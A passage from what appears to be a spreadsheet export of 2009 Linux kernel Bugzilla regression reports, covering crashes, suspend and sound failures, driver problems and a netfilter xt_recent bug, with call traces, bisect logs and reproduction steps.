] 5 Gamepad Item(Main ): Collection, data= [ 0x01 ] 1 Application Item(Global): Usage Page, data= [ 0x01 ] 1 Generic Desktop Controls Item(Local ): Usage, data= [ 0x01 ] 1 Pointer Item(Main ): Collection, data= [ 0x00 ] 0 Physical Item(Global): Usage Page, data= [ 0x09 ] 9 Buttons Item(Local ): Usage Minimum, data= [ 0x01 ] 1 Button 1 (Primary) Item(Local ): Usage Maximum, data= [ 0x0c ] 12 (null) Item(Global): Logical Minimum, data= [ 0x00 ] 0 Item(Global): Logical Maximum, data= [ 0x01 ] 1 Item(Global): Report Size, data= [ 0x01 ] 1 Item(Global): Report Count, data= [ 0x0c ] 12 Item(Main ): Input, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Report Size, data= [ 0x08 ] 8 Item(Global): Report Count, data= [ 0x01 ] 1 Item(Main ): Input, data= [ 0x01 ] 1 Constant Array Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Usage Page, data= [ 0x01 ] 1 Generic Desktop Controls Item(Local ): Usage, data= [ 0x39 ] 57 Hat Switch Item(Global): Logical Maximum, data= [ 0x07 ] 7 Item(Global): Physical Minimum, data= [ 0x00 ] 0 Item(Global): Physical Maximum, data= [ 0x0e 0x01 ] 270 Item(Global): Unit, data= [ 0x40 0x00 ] 64 System: None, Unit: None^4 Item(Global): Report Size, data= [ 0x04 ] 4 Item(Main ): Input, data= [ 0x42 ] 66 Data Variable Absolute No_Wrap Linear Preferred_State Null_State Non_Volatile Bitfield Item(Local ): Usage, data= [ 0x30 ] 48 Direction-X Item(Local ): Usage, data= [ 0x31 ] 49 Direction-Y Item(Global): Logical Minimum, data= [ 0x80 ] 128 Item(Global): Logical Maximum, data= [ 0x7f ] 127 Item(Global): Physical Maximum, data= [ 0xff 0x00 ] 255 Item(Global): Unit, data= [ 0x00 0x00 ] 0 System: None, Unit: (None) Item(Global): Report Size, data= [ 0x08 ] 8 Item(Global): Report Count, data= [ 0x02 ] 2 Item(Main ): Input, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Local ): Usage, data= [ 0x35 ] 53 Rotate-Z Item(Global): Report Count, data= [ 0x01 ] 1 Item(Main ): Input, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Local ): Usage, data= [ 0x36 ] 54 Slider Item(Global): Logical Minimum, data= [ 0x00 0x00 ] 0 Item(Global): Logical Maximum, data= [ 0xff 0x00 ] 255 Item(Main ): Input, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Local ): Usage, data= [ 0xbb ] 187 (null) Item(Global): Logical Minimum, data= [ 0x00 ] 0 Item(Global): Logical Maximum, data= [ 0xff 0x00 ] 255 Item(Global): Physical Minimum, data= [ 0x00 ] 0 Item(Global): Physical Maximum, data= [ 0xff 0x00 ] 255 Item(Global): Report Size, data= [ 0x08 ] 8 Item(Global): Report Count, data= [ 0x04 ] 4 Item(Main ): Output, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Main ): End Collection, data=none Item(Main ): End Collection, data=none Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 16 Device Status: 0x0002 (Bus Powered) Remote Wakeup Enabled</t>
  </si>
  <si>
    <t>Linux 2.6.28.3 freezing on a 32-bits x86 Thinkpad T43p</t>
  </si>
  <si>
    <t>2.6.28.3</t>
  </si>
  <si>
    <t>2009-02-08 11:21 UTC</t>
  </si>
  <si>
    <t>2009-02-25 15:02 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.28.3 freezing on a 32-bits x86 Thinkpad T43p Submitter : Mathieu Desnoyers &lt;mathieu.desnoyers@polymtl.ca&gt; Date : 2009-02-04 21:11 References : http://marc.info/?l=linux-kernel&amp;m=123378196022258&amp;w=4 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>commit 64ff3b938ec6782e6585a83d5459b98b0c3f6eb8 breaks rlogin</t>
  </si>
  <si>
    <t>commit 64ff3b938ec6782e6585a83d5459b98b0c3f6eb8</t>
  </si>
  <si>
    <t>2009-02-08 11:36 UTC</t>
  </si>
  <si>
    <t>2009-02-14 14:35 UTC</t>
  </si>
  <si>
    <t>Subject : commit 64ff3b938ec6782e6585a83d5459b98b0c3f6eb8 breaks rlogin Submitter : Jeff Chua &lt;jeff.chua.linux@gmail.com&gt; Date : 2009-02-05 14:41 References : http://marc.info/?l=linux-kernel&amp;m=123384496107361&amp;w=4 Handled-By : Herbert Xu &lt;herbert@gondor.apana.org.au&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit 64ff3b938ec6782e6585a83d5459b98b0c3f6eb8 Author: Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Date: Thu Dec 25 17:12:58 2008 -0800 tcp: Always set urgent pointer if it's beyond snd_nxt Signed-off-by: Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; First-Bad-Commit : 64ff3b938ec6782e6585a83d5459b98b0c3f6eb8</t>
  </si>
  <si>
    <t>linux 2.6.29-rc3 kernel failure with mptsas</t>
  </si>
  <si>
    <t>2009-02-08 11:44 UTC</t>
  </si>
  <si>
    <t>2009-02-14 14:04 UTC</t>
  </si>
  <si>
    <t>Subject : linux 2.6.29-rc3 kernel failure with mptsas Submitter : "Morten P.D. Stevens" &lt;mstevens@win-professional.com&gt; Date : 2009-02-05 22:29 References : http://marc.info/?l=linux-kernel&amp;m=123387302729741&amp;w=4 Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123396429501103&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>viafb triggers BUG at mm/vmalloc.c:294</t>
  </si>
  <si>
    <t>2009-02-08 12:05 UTC</t>
  </si>
  <si>
    <t>2012-05-30 13:03 UTC</t>
  </si>
  <si>
    <t>Subject : viafb triggers BUG at mm/vmalloc.c:294 [kernel 2.6.28.3] Submitter : wixor &lt;wixorpeek@gmail.com&gt; Date : 2009-02-07 19:44 References : http://marc.info/?l=linux-kernel&amp;m=123403591109515&amp;w=4 Handled-By : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Build failure with latest -git: btrfs on ppc64</t>
  </si>
  <si>
    <t>2009-02-08 12:09 UTC</t>
  </si>
  <si>
    <t>2009-02-14 14:39 UTC</t>
  </si>
  <si>
    <t>Subject : Build failure with latest -git: btrfs on ppc64 Submitter : Chuck Ebbert &lt;cebbert@redhat.com&gt; Date : 2009-02-07 20:50 References : http://marc.info/?l=linux-kernel&amp;m=123404002114219&amp;w=4 Notify-Also : Kyle McMartin &lt;kyle@infradead.org&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28.4 regression: mmap fails if mlockall used</t>
  </si>
  <si>
    <t>2009-02-08 12:23 UTC</t>
  </si>
  <si>
    <t>2009-02-08 14:02 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28.4 regression: mmap fails if mlockall used Submitter : Sami Farin &lt;safari-kernel@safari.iki.fi&gt; Date : 2009-02-08 10:52 References : http://marc.info/?l=linux-kernel&amp;m=123409037423068&amp;w=4 Notify-Also : Hugh Dickins &lt;hugh@veritas.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>uvc_status_cleanup(): undefined reference to `input_unregister_device'</t>
  </si>
  <si>
    <t>2.6.29-rc3-697-gae1a25d</t>
  </si>
  <si>
    <t>2009-02-08 12:30 UTC</t>
  </si>
  <si>
    <t>2009-04-07 21:17 UTC</t>
  </si>
  <si>
    <t>Subject : uvc_status_cleanup(): undefined reference to `input_unregister_device' Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2009-02-08 14:58 References : http://marc.info/?l=linux-kernel&amp;m=123410529909318&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING at fs/namespace.c:636 mntput_no_expire()</t>
  </si>
  <si>
    <t>2009-02-09 00:15 UTC</t>
  </si>
  <si>
    <t>2009-02-18 00:22 UTC</t>
  </si>
  <si>
    <t>Kernel version: 2.6.29-rc4 Problem Description and steps to reproduce: Though it's triggered while testing cgroup, I think it may be a bug in VFS. Thread 1: for ((; ;)) { mount -t cgroup -o cpuset xxx /mnt &gt; /dev/null 2&gt;&amp;1 mkdir /mnt/0 &gt; /dev/null 2&gt;&amp;1 rmdir /mnt/0 &gt; /dev/null 2&gt;&amp;1 umount /mnt &gt; /dev/null 2&gt;&amp;1 } Thread 2: for ((; ;)) { mount -t cpuset xxx /mnt &gt; /dev/null 2&gt;&amp;1 umount /mnt &gt; /dev/null 2&gt;&amp;1 } (Note: Again it is irrelevant which cgroup subsys is used.) After a while this showed up: ------------[ cut here ]------------ WARNING: at fs/namespace.c:636 mntput_no_expire+0xe2/0x128() Hardware name: Aspire SA85 Modules linked in: bridge stp llc autofs4 parport_pc r8169 parport mii button sg sata_sis pata_sis ata_generic libata sd_mod scsi_mod ext3 jbd mbcache uhci_hcd ohci_hcd ehci_hcd [last unloaded: scsi_wait_scan] Pid: 10426, comm: umount Not tainted 2.6.29-rc4 #544 Call Trace: [&lt;c042da3a&gt;] warn_slowpath+0x79/0x8f [&lt;c0425516&gt;] ? try_to_wake_up+0x328/0x332 [&lt;c044bb91&gt;] ? trace_hardirqs_off+0xb/0xd [&lt;c06272ec&gt;] ? _spin_unlock_irqrestore+0x34/0x41 [&lt;c0425516&gt;] ? try_to_wake_up+0x328/0x332 [&lt;c0513008&gt;] ? __delay+0xe/0x10 [&lt;c0516999&gt;] ? _raw_spin_lock+0xa2/0xfb [&lt;c04b4d36&gt;] ? mntput_no_expire+0x79/0x128 [&lt;c04b4d9f&gt;] mntput_no_expire+0xe2/0x128 [&lt;c04b5288&gt;] sys_umount+0x26c/0x2b3 [&lt;c04b52e1&gt;] sys_oldumount+0x12/0x14 [&lt;c0403351&gt;] sysenter_do_call+0x12/0x31 ---[ end trace ec32f8e5dbe67ca1 ]--- The WARNING is: WARN_ON(atomic_read(&amp;mnt-&gt;__mnt_writers));</t>
  </si>
  <si>
    <t>Kernel locks up when loading X with Radeon DRI</t>
  </si>
  <si>
    <t>2009-02-09 06:32 UTC</t>
  </si>
  <si>
    <t>Tom Stellard</t>
  </si>
  <si>
    <t>2009-02-12 03:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.29-rc3 Earliest failing kernel version: 2.6.29-rc4 Distribution: Gentoo Hardware Environment: Thinkpad R51e ATI Radeon xpress 200m graphics card Software Environment: Problem Description: After booting, my system locks up right as X begins to load. My system worked fine with 2.6.29-rc3. I did a git bisect and this is the bad commit: 86adf8adfcb3d3f4b6c30aeb40da480da02de1d1 Steps to reproduce: Boot machine with kernel 2.6.29-rc4</t>
  </si>
  <si>
    <t>Toshiba L355 will suspend/resume once, but after a second suspend, won;t resume</t>
  </si>
  <si>
    <t>2.6.29rc4</t>
  </si>
  <si>
    <t>2009-02-10 11:39 UTC</t>
  </si>
  <si>
    <t>2010-06-27 23:47 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: Unknown Distribution: Mandriva Hardware Environment: Toshibe Satellite L355-S7812 Software Environment: Mandriva Cooker Problem Description:After a suspend/resume, and a second suspend, the machine refuses to resume. See http://marc.info/?l=linux-acpi&amp;m=123421014421021&amp;w=2 for some more info, aswell as http://bugzilla.kernel.org/show_bug.cgi?id=12641 for another acpi problem with attachments Steps to reproduce:</t>
  </si>
  <si>
    <t>bnx2_poll_work kernel panic</t>
  </si>
  <si>
    <t>2.6.27.15</t>
  </si>
  <si>
    <t>2009-02-13 03:10 UTC</t>
  </si>
  <si>
    <t>Pascal de Bruijn</t>
  </si>
  <si>
    <t>2010-01-25 14:49 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.19 Earliest failing kernel version: 2.6.27.15 We did not test kernel versions in between 2.6.27.15 and 2.6.22.19 Distribution: Debian GNU/Linux 4.0r6 (fully updated), with self built vanilla kernel. Hardware Environment: HP DL360 G5, with two onboard Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet Controllers Software Environment: Debian GNU/Linux 4.0r6 using rsync 3.0.3 Problem Description: After initializing daily (nightly) rsync backups our backup server panics with the following call trace (we've had this issue twice, so we downgraded our kernel). The following call trace was captured using a digital camera and reproduced as the following text: [24756.631365] Call Trace: [24756.631365] [&lt;c0108ba8&gt;] nommu_map_single+0x38/0x80 [24756.631365] [&lt;c0261e77&gt;] bnx2_poll+0x67/01d0 [24756.631365] [&lt;c02e9e47&gt;] net_rx_Action+0x87/0x130 [24756.631365] [&lt;c0128b82&gt;] __do_softirq+0x82/0x100 [24756.631365] [&lt;c0128da0&gt;] ksoftirqd+0x0/0xf0 [24756.631365] [&lt;c0128c37&gt;] do_softirq+0x37/0x40 [24756.631365] [&lt;c0128e12&gt;] ksoftirqd+0x72/0xf0 [24756.631365] [&lt;c01365d2&gt;] kthread+0x42/0x70 [24756.631365] [&lt;c0136590&gt;] kthread+0x0/0x70 [24756.631365] [&lt;c0103c2f&gt;] kernel_thread_helper+0x7/0x18 [24756,631697] ======================= [24756.631697] Code: 00 00 00 8b 9c 24 a8 00 00 00 48 83 ea 04 3b 84 24 8c 00 00 00 0f 45 94 24 88 00 00 00 89 24 88 00 00 00 8b 94 24 8c 00 00 00 &lt;8b&gt; 0e 8d 04 52 8b 93 8c 00 00 00 8d 04 85 10 00 00 00 01 d0 8d [24756.631925] EIP: [&lt;c02613d6&gt;] bnx2_poll_work+0xa0d/0x1010 SS:ESP 0068:f787fea8 [24756.632218] Kernel panic - not syncing: Fatal exception in interrupt Steps to reproduce: 1. Boot server using 2.6.27.15 kernel 2. Start several (about 10) simultaneous rsync processes to the server 3. Wait for crash</t>
  </si>
  <si>
    <t>[git bisect] 2.6.29 regression: snd_hda_intel suspend bug</t>
  </si>
  <si>
    <t>2.6.29-rc5</t>
  </si>
  <si>
    <t>2009-02-15 09:30 UTC</t>
  </si>
  <si>
    <t>2009-02-23 15:40 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: &gt;2.6.28 Earliest failing kernel version: &lt;2.6.29-rc4 Distribution: Gentoo Hardware Environment: Lenovo ThinPad SL300, GM45, Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) Problem Description: After resuming from suspend to RAM, there is no sound. Processes trying to play sounds simply freeze. Running "aplay error.wav" in the console (with no other processes relevant to sound running) yields the following error messages: [ 1059.062824] __ratelimit: 567 callbacks suppressed [ 1059.062832] ALSA sound/pci/hda/hda_intel.c:688: hda-intel: send_cmd timeout: IRS=0xffff, val=0x1f000a [ 1059.062982] ALSA sound/pci/hda/hda_intel.c:688: hda-intel: send_cmd timeout: IRS=0xffff, val=0x1c70600 [ 1059.063132] ALSA sound/pci/hda/hda_intel.c:688: hda-intel: send_cmd timeout: IRS=0xffff, val=0x1070650 [ 1059.064539] ALSA sound/pci/hda/hda_intel.c:688: hda-intel: send_cmd timeout: IRS=0xffff, val=0x1020031 [ 1063.316067] ALSA sound/pci/hda/hda_intel.c:688: hda-intel: send_cmd timeout: IRS=0xffff, val=0x1070600 Steps to reproduce: pm-suspend (resume from suspend) aplay some_sound_file.wav After running git-bisect, I have found the commit that causes this bug on my hardware. It is: 32e176c14d7a425b681ef003c9061001ddb7fc7b is first bad commit commit 32e176c14d7a425b681ef003c9061001ddb7fc7b Author: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Date: Sat Dec 6 15:09:08 2008 +0100 Sound: hda - Restore PCI configuration space with interrupts off Move the restoration of the standard PCI configuration registers in the snd_hda_intel driver to a -&gt;resume_early() callback executed with interrupts disabled, since doing that with interrupts enabled may lead to problems in some cases. This patch addresses the regression from 2.6.26 tracked as http://bugzilla.kernel.org/show_bug.cgi?id=12121 . Signed-off-by: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Signed-off-by: Takashi Iwai &lt;tiwai@suse.de&gt; :040000 040000 f085132f23cffddd5aaed52d20c2d4081f74cdad 122446d572ef3245d1879202 0dd73a798b52c9fe M sound Reverting that patch makes sound work again after suspend on 2.6.29-rc5</t>
  </si>
  <si>
    <t>Hang on resume from hibernation, apparently as result of 213d9417fec</t>
  </si>
  <si>
    <t>2009-02-15 11:34 UTC</t>
  </si>
  <si>
    <t>2009-02-19 04:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.29-rc3 Earliest failing kernel version: 2.6.29-rc4 Distribution: Ubuntu gutsy Hardware Environment: T60p Software Environment: disk with dm crypt full disk encryption Problem Description: Summary: seem to need to revert 213d9417fec62ef4c3675621b9364a667954d4dd to fix resume from hibernation. On kernel 2.6.29-rc3 and earlier, suspend/resume from disk (hibernation) works fine. Starting with 2.6.29-rc4, I get hangs on resume from suspend to disk. On resume, after a bit of regular activity, the disk LED lights up with an unusual dull color and stays that way. Pressing CTRL-ALT-DEL causes linux to print a message that it will reboot, and reboot after a couple of seconds. I bisected and got to the following commit: commit 213d9417fec62ef4c3675621b9364a667954d4dd Author: Jens Axboe &lt;jens.axboe@oracle.com&gt; Date: Tue Jan 6 09:16:05 2009 +0100 block: seperate bio/request unplug and sync bits Signed-off-by: Jens Axboe &lt;jens.axboe@oracle.com&gt; I reverted the commit 213d9417fec62ef4c3675621b9364a667954d4dd on top of 2.6.29-rc5 (resolving a trivial conflict) and verified that reverting this commit fixes hibernate for me. Bisect log below: git bisect start # bad: [8e4921515c1a379539607eb443d51c30f4f7f338] Linux 2.6.29-rc4 git bisect bad 8e4921515c1a379539607eb443d51c30f4f7f338 # good: [18e352e4a73465349711a9324767e1b2453383e2] Linux 2.6.29-rc3 git bisect good 18e352e4a73465349711a9324767e1b2453383e2 # bad: [5c350d93ff4736086a1b08fef1d0b5e22138d2e0] Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc git bisect bad 5c350d93ff4736086a1b08fef1d0b5e22138d2e0 # good: [bb9f113f5ca7d182256dee69bcaebd4c79062305] headers_check fix: sound/hdsp.h git bisect good bb9f113f5ca7d182256dee69bcaebd4c79062305 # bad: [2d2eca4d11933bd37a4944aae06e6122efffaea8] MIPS: Alchemy: time.c build fix git bisect bad 2d2eca4d11933bd37a4944aae06e6122efffaea8 # bad: [ae704e9f92f87b12c5938b07245792857c7c9c14] Merge branch 'for-linus' of git://git.kernel.dk/linux-2.6-block git bisect bad ae704e9f92f87b12c5938b07245792857c7c9c14 # good: [584dbe9475313e117abf9d2af88164edfd429c9a] netxen: fix memory leak in drivers/net/netxen_nic_init.c git bisect good 584dbe9475313e117abf9d2af88164edfd429c9a # bad: [7598909e3ee2a08726276d6415b69dadb52d0d76] Mark mandatory elevator functions in the biodoc.txt git bisect bad 7598909e3ee2a08726276d6415b69dadb52d0d76 # good: [1308835ffffe6d61ad1f48c5c381c9cc47f683ec] block: export SSD/non-rotational queue flag through sysfs git bisect good 1308835ffffe6d61ad1f48c5c381c9cc47f683ec # bad: [dbdac9b71dff5d27885f82eb2cfca310861fdf9e] block: Fix documentation for blkdev_issue_flush() git bisect bad dbdac9b71dff5d27885f82eb2cfca310861fdf9e # bad: [1dfa17f4ab8543d82caf4d36636b93916a18f456] block: add bio_rw_flagged() for testing bio-&gt;bi_rw # Had trouble booting, booted second time after reset git bisect bad 1dfa17f4ab8543d82caf4d36636b93916a18f456 # bad: [213d9417fec62ef4c3675621b9364a667954d4dd] block: seperate bio/request unplug and sync bits # Shows suspend progress nicely, some other commits tested don't git bisect bad 213d9417fec62ef4c3675621b9364a667954d4dd Steps to reproduce: sudo bash echo disk &gt; /sys/power/state press power button to resume</t>
  </si>
  <si>
    <t>[pata_ali] ATAPI UltraDMA on secondary channel broken</t>
  </si>
  <si>
    <t>2009-02-15 14:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 (with libata) Earliest failing kernel version: confirmed 2.6.27 (with libata), possibly 2.6.25 Distribution: Slackware 12.2 Hardware Environment: 00:12.0 IDE interface [0101]: ALi Corporation M5229 IDE [10b9:5229] (rev c7) See http://bugzilla.kernel.org/show_bug.cgi?id=9904 for more hardware info. Problem Description: Linux 2.6.24 (Slackware 12.1) pata_ali driver worked reliable in ATAPI UltraDMA mode reading and writing media on both channels, beside the cable detection issue mentioned in bug #9904 (which occured only with this specific ASUS drive). The 2.6.27 driver completely disables ATAPI DMA and the atapi_dma=1 modparm brings it back only on the primary channel. pata_ali 0000:00:12.0: PCI INT A -&gt; GSI 19 (level, low) -&gt; IRQ 19 scsi3 : pata_ali scsi4 : pata_ali ata4: PATA max UDMA/133 cmd 0x1f0 ctl 0x3f6 bmdma 0xff00 irq 14 ata5: PATA max UDMA/133 cmd 0x170 ctl 0x376 bmdma 0xff08 irq 15 ata4.00: ATAPI: PIONEER DVD-RW DVR-212, 1.28, max UDMA/66 ata4.00: configured for UDMA/66 ata5.00: ATAPI: MATSHITADVD-RAM SW-9576S, AY0J, max UDMA/66 ata5.00: simplex DMA is claimed by other device, disabling DMA ata5.00: configured for PIO4 # hdparm -t /dev/sr1 /dev/sr1: Timing buffered disk reads: 6 MB in 3.18 seconds = 1.89 MB/sec So the secondary channel is completely unusable now with libata. Also I see no sense in the atapi_dma switch and its default (off), because ATAPI DMA was fine on 2.6.24. There might be a tunable for buggy hardware, but this default (which does not work with modern DVD writers at all) is bogus and should be changed.</t>
  </si>
  <si>
    <t>Sound don't work with my toshiba X200 and kernel 2.6.29</t>
  </si>
  <si>
    <t>2.6.31</t>
  </si>
  <si>
    <t>2009-02-17 23:14 UTC</t>
  </si>
  <si>
    <t>chepioq</t>
  </si>
  <si>
    <t>2010-11-11 19:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.28-3.fc11 Earliest failing kernel version:2.6.29-0.124.rc5.fc11 Distribution:Fedora 11 rawhide Hardware Environment:00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03) Software Environment:Alsa, Pulseaudio Problem Description: I tested F11 rawhide and with the latest kernel (2.6.29) I have no sound. I post a bug on bugzilla of Fedora (https://bugzilla.redhat.com/show_bug.cgi?id=485295 ) and they respond me it is a kernel bug... I have sound with F11 rawhide and kernel 2.6.28 Tell me if you want any informations... Thank Chepioq</t>
  </si>
  <si>
    <t>GSPCA drivers don't recognize webcam OV7630C sensor properly</t>
  </si>
  <si>
    <t>2.6.27-gentoo-r8</t>
  </si>
  <si>
    <t>2009-02-18 10:55 UTC</t>
  </si>
  <si>
    <t>vladimir</t>
  </si>
  <si>
    <t>2009-02-19 10:51 UTC</t>
  </si>
  <si>
    <t>I used gspcav1 drivers for my web cam (dlink dsb C320) with 2.6.25-r6 kernel and it worked properly in all applications. After kernel upgrade to 2.6.27-gentoo-r8 and enabling GSPCA drivers in the kernel, my web cam stopped working. The new kernel doesn't recognize the OV7630C sensor properly. system log before upgrade: Jan 20 08:59:25 vs Linux video capture interface: v2.00 Jan 20 08:59:25 vs /var/tmp/portage/media-video/gspcav1-20071224/work/gspcav1-20071224/gspca_core.c: USB GSPCA camera found.(ZC3XX) Jan 20 08:59:25 vs /var/tmp/portage/media-video/gspcav1-20071224/work/gspcav1-20071224/gspca_core.c: [spca5xx_probe:4275] Camera type JPEG Jan 20 08:59:25 vs /var/tmp/portage/media-video/gspcav1-20071224/work/gspcav1-20071224/Vimicro/zc3xx.h: [zcxx_probeSensor:246] sensor answervga 0x7631 Jan 20 08:59:25 vs /var/tmp/portage/media-video/gspcav1-20071224/work/gspcav1-20071224/Vimicro/zc3xx.h: [zc3xx_config:622] Find Sensor OV7630C Jan 20 08:59:25 vs /var/tmp/portage/media-video/gspcav1-20071224/work/gspcav1-20071224/gspca_core.c: [spca5xx_getcapability:1249] maxw 640 maxh 480 minw 160 minh 120 Jan 20 08:59:25 vs /var/tmp/portage/media-video/gspcav1-20071224/work/gspcav1-20071224/gspca_core.c: data format set to RGB Jan 20 08:59:25 vs usbcore: registered new interface driver gspca Jan 20 08:59:25 vs /var/tmp/portage/media-video/gspcav1-20071224/work/gspcav1-20071224/gspca_core.c: gspca driver 01.00.20 registered system log after upgrade: Feb 17 10:51:15 vs Linux video capture interface: v2.00 Feb 17 10:51:15 vs gspca: main v2.2.0 registered Feb 17 10:51:15 vs gspca: probing 0ac8:0302 Feb 17 10:51:15 vs zc3xx: probe 2wr ov vga 0x7631 Feb 17 10:51:15 vs zc3xx: probe 3wr vga 1 0x0000 Feb 17 10:51:15 vs zc3xx: probe 3wr vga 2 0x0000 Feb 17 10:51:15 vs zc3xx: Sensor UNKNOW_0 force Tas5130 Feb 17 10:51:15 vs gspca: probe ok Feb 17 10:51:15 vs gspca: probing 0ac8:0302 Feb 17 10:51:15 vs gspca: probing 0ac8:0302 Feb 17 10:51:15 vs usbcore: registered new interface driver zc3xx Feb 17 10:51:15 vs zc3xx: registered Feb 17 10:51:15 vs usbcore: registered new interface driver snd-usb-audio # lsusb: Bus 002 Device 003: ID 0ac8:0302 Z-Star Microelectronics Corp. ZC0302 WebCam</t>
  </si>
  <si>
    <t>IBM TrackPoint not working on 2.6.28.6</t>
  </si>
  <si>
    <t>2.6.28.6</t>
  </si>
  <si>
    <t>2009-02-19 14:16 UTC</t>
  </si>
  <si>
    <t>Allin Cottrell</t>
  </si>
  <si>
    <t>2009-10-21 17:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28.5 Earliest failing kernel version: 2.6.28.6 Distribution: None Hardware Environment: Lenovo ThinkPad T60p Software Environment: GNU/Linux Problem Description: Instead of initializing the TrackPoint, I get "psmouse.c: Failed to enable mouse on isa0060/serio1" From dmesg on 2.6.28.5: serio: Synaptics pass-through port at isa0060/serio1/input0 input: SynPS/2 Synaptics TouchPad as /class/input/input7 IBM TrackPoint firmware: 0x0e, buttons: 3/3 input: TPPS/2 IBM TrackPoint as /class/input/input8 EXT3-fs: mounted filesystem with ordered data mode... And on 2.6.28.6: serio: Synaptics pass-through port at isa0060/serio1/input0 input: SynPS/2 Synaptics TouchPad as /class/input/input7 psmouse.c: Failed to enable mouse on isa0060/serio1 EXT3-fs: mounted filesystem with ordered data mode... Steps to reproduce: occurs on booting</t>
  </si>
  <si>
    <t>Oops when renaming interfaces added to a bridge</t>
  </si>
  <si>
    <t>2.6.27.18</t>
  </si>
  <si>
    <t>2009-02-20 04:01 UTC</t>
  </si>
  <si>
    <t>2012-05-30 14:10 UTC</t>
  </si>
  <si>
    <t>Distribution: custom Hardware Environment: ARM PXA320 [reproduced on Fedora 10 with 2.6.27.15-170.2.24.fc10.x86_64 too] Problem Description: When renaming an interface which was added to a bridge, its name won't be changed in the bridge setup. Adding another interface which was created later with the original name, kernel oopses A 'find /sys -name dummy*' between step 4 and 5 reports /sys/devices/virtual/net/br0/brif/dummy0 /sys/devices/virtual/net/dummy100 /sys/bus/i2c/drivers/dummy /sys/class/net/dummy100 Although it is only a WARNING, system goes havoc because whole networking stack seems to be unusable then. Steps to reproduce: 1. brctl addbr br0 2. modprobe -o d0 dummy 3. brctl addif br0 dummy0 4. ifrename -i dummy0 -n dummy100 5. modprobe -o d1 dummy 6. brctl addif br0 dummy0 device dummy0 entered promiscuous mode ------------[ cut here ]------------ WARNING: at fs/sysfs/dir.c:463 sysfs_add_one+0x34/0x48() ....</t>
  </si>
  <si>
    <t>/proc/net/xt_recent/: +IP / -IP commands broken for IPv4</t>
  </si>
  <si>
    <t>2.6.28.7</t>
  </si>
  <si>
    <t>2009-02-22 15:11 UTC</t>
  </si>
  <si>
    <t>Josef Drexler</t>
  </si>
  <si>
    <t>2010-01-25 14:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: up to at least 2.6.24 Earliest failing kernel version: first noticed with upgrade to 2.6.28 Distribution: Debian lenny, Ubuntu 8.04 Hardware Environment: x86 Problem Description: An uninitialized buffer causes IPv4 addresses added manually (via the +IP command to the proc interface) to never match any packets. Similarly, the -IP command fails to remove IPv4 addresses. Details: In the function recent_entry_lookup, the xt_recent module does comparisons of the entire nf_inet_addr union value, both for IPv4 and IPv6 addresses. For addresses initialized from actual packets the remaining 12 bytes not occupied by the IPv4 are zeroed so this works correctly. However when setting the nf_inet_addr addr variable in the recent_mt_proc_write function, only the IPv4 bytes are initialized and the remaining 12 bytes contain garbage. Hence addresses added in this way never match any packets, unless these uninitialized 12 bytes happened to be zero by coincidence. Similarly, addresses cannot consistently be removed using the proc interface due to mismatch of the garbage bytes (although it will sometimes work to remove an address that was added manually). Reading the /proc/net/xt_recent/ entries hides this problem because this only uses the first 4 bytes when displaying IPv4 addresses. Steps to reproduce: $ iptables -I INPUT -m recent --rcheck -j LOG $ echo +169.254.156.239 &gt; /proc/net/xt_recent/DEFAULT $ cat /proc/net/xt_recent/DEFAULT src=169.254.156.239 ttl: 0 last_seen: 119910 oldest_pkt: 1 119910 [At this point no 